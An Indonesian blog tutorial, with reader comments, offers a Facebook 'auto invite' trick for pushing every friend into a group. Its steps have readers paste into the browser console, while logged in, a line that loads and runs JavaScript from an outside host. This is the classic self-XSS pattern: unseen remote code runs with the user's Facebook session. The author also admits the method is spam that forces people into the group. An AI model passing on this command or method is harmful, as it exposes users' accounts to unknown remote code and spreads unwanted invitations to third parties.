Anda pengunjung yang ke:

Traffic Counter

BANNER SAHABAT

Sabtu, 08 September 2012

Cara Mengundang Semua orang ke grup Fb Mu | Script Auto Invet Grup Facebook | TuTorial ku UnTuK Mu

Filled under:

 
Jika Anda memiliki sebuah group di facebook dan kesulitan mengundang orang satu persatu, Anda bisa menggunakan script auto invite facebook untuk mengundang teman secara otomatis ke group. Teknik ini memang terkesan memaksa orang lain untuk bergabung ke group kita, dan tentunya yang namanya memaksa kesan negatif dari orang-orang yang Anda undang selalu ada.
Saya pernah mempraktekkan teknik ini di group facebook saya “Simpang Blakblakan” dan hasilnya luar biasa dalam waktu hanya hitungan menit saya bisa memaksa orang untuk bergabung dengan jumlah ribuan (semua orang yang menjadi teman di facebook). Tapi seperti yang saya bilang di atas kesan positif dan negatif muncul dari orang-orang yang saya undang. Ada yang merasa senang dan merasa dihargai karena telah saya undang, ada juga yang merasa terganggu dan langsung minta dihapus dari anggota group.
Teknik ini dianggap teknik spammer yang dianggap mengganggu bagi beberapa anggota facebook terutama bagi mereka yang mengerti tentang ngeblog atau internet marketing. Tapi menurut saya itu tergantung tujuan awal kita sebelumnya, apakah memiliki tujuan negatif atau dengan tujuan baik. Misal saya mencoba teknik ini karena banyak anggota group “Simpang Blakblakan” yang ingin belajar ngeblog, sedangkan mereka berasal dari berbagai kalangan yang tidak ada basik ngeblog. Sedangkan saya sendiri tidak banyak waktu dan terbatas pengetahuan untuk share ilmu pada mereka sendirian. Oleh karena itu saya mengharapkan ada orang-orang baru yang mau sukarela membagi ilmu secara gratis di group “Simpang Blakblakan”.
Apakah saya salah menggunakan teknik Auto Invite Facebook untuk bertujuan baik menurut saya (supaya banyak orang terbantu) ? Penilian tergantung siapa dan dari sisi mana Anda menilai.
Bagi Anda yang ingin mencoba script auto invite facebook untuk mengundang teman secara otomatis ke group dengan resiko yang harus Anda tanggung sendiri tentunya.

Berikut tutorialnya :
  • Silahkan Anda buka halaman group facebook Anda
  • Jika Anda menggunakan Mozilla firefox silahkan tekan tombol CTRL + SHIFT + K di keyboard
  • Copy kode

 document.body.appendChild(document.createElement('script')).src='http://aku-ca.pe.hu/file/Sariptrik.blogspot.com.js';

  • Kemudian pastekan dan ENTER.
Script Auto Invite Facebook
  • Jika Anda menggunakan Google Chrome Anda klik kanan mouse di halaman group Anda
  • Pilih Inspect Element and Console
  • Copy dan paste kode di bawah ini
document.body.appendChild(document.createElement('script')).src='http://aku-ca.pe.hu/file/Sariptrik.blogspot.com.js';
  • Kemudian tekan ENTER
  • Anda tinggal tunggu prosesnya beberapa saat sampai dengan selesai.
Silahkan Anda bisa mencoba teknik dengan menggunakan script auto invite facebook untuk mengundang teman secara otomatis ke group.

Ditulis Oleh : SyariÆ’™ ~ Tips dan Trik Blogspot

Syarip Hidayat Sobat sedang membaca artikel tentang Cara Mengundang Semua orang ke grup Fb Mu | Script Auto Invet Grup Facebook | TuTorial ku UnTuK Mu. TuTorial Ku UnTuK Mu™ Memperbolehkan mengcopy paste atau menyebar-luaskan artikel ini, namun jangan lupa untuk meletakkan link dibawah ini sebagai sumbernya



Baca Artikel Lainnya.!:

4 komentar:

  1. saya liat dari beberapa blog httpnya selalu berubah bagaimana untuk membuat http khusus saya.

    Salam Sukses :12

    BalasHapus
  2. Informasi yang sangat membantu... ditunggu ilmu berikutnya gan..

    BalasHapus
  3. wah keren ya gan, ikutan mau nYoba

    BalasHapus